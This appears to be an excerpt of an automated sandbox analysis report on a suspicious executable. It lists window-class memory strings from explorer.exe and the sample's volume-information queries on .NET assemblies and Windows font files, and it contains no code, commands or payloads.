Source: explorer.exe, 0000000F.00000000.342798346.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.361461353.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.431057607.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.379876329.0000000001400000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: uProgram Manager
Source: explorer.exe, 0000000F.00000000.363485956.0000000005F40000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.342798346.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.361461353.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.431057607.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.379876329.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.476695178.0000000003CAA000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.491601749.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.496451134.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.603770655.0000000005C80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000F.00000000.342798346.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.361461353.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.431057607.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.379876329.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000002.603327342.000000000537A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.481128035.000000000537A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.484507858.000000000537A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.484893094.000000000538B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.483030565.000000000538B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.486355986.000000000538B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.486172861.000000000537A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.483630102.000000000537A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.491601749.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.501345800.000000000537A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.480718352.000000000537A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.496451134.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.496076113.000000000537A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.491362805.000000000537A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.482558065.000000000537A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.603770655.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.481290404.0000000005389000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000001E.00000000.489397348.0000000000EF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.601570857.0000000000EF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.494616326.0000000000EF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.499065146.0000000000EF9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progmanb
Source: explorer.exe, 0000001E.00000003.482390182.0000000005353000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.603220789.0000000005310000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.484477118.0000000005353000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.483606549.0000000005353000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.501287373.0000000005318000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.481101139.0000000005353000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.480692412.0000000005353000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.495943991.0000000005318000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.486147134.0000000005353000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd/
Source: explorer.exe, 0000000F.00000000.360548916.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.430748088.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.379669641.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.342229974.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 0000000F.00000000.342798346.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.361461353.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.431057607.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.379876329.0000000001400000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000F.00000000.368905426.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.352777288.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.386085770.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWndAj

Language, Device and Operating System Detection
barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
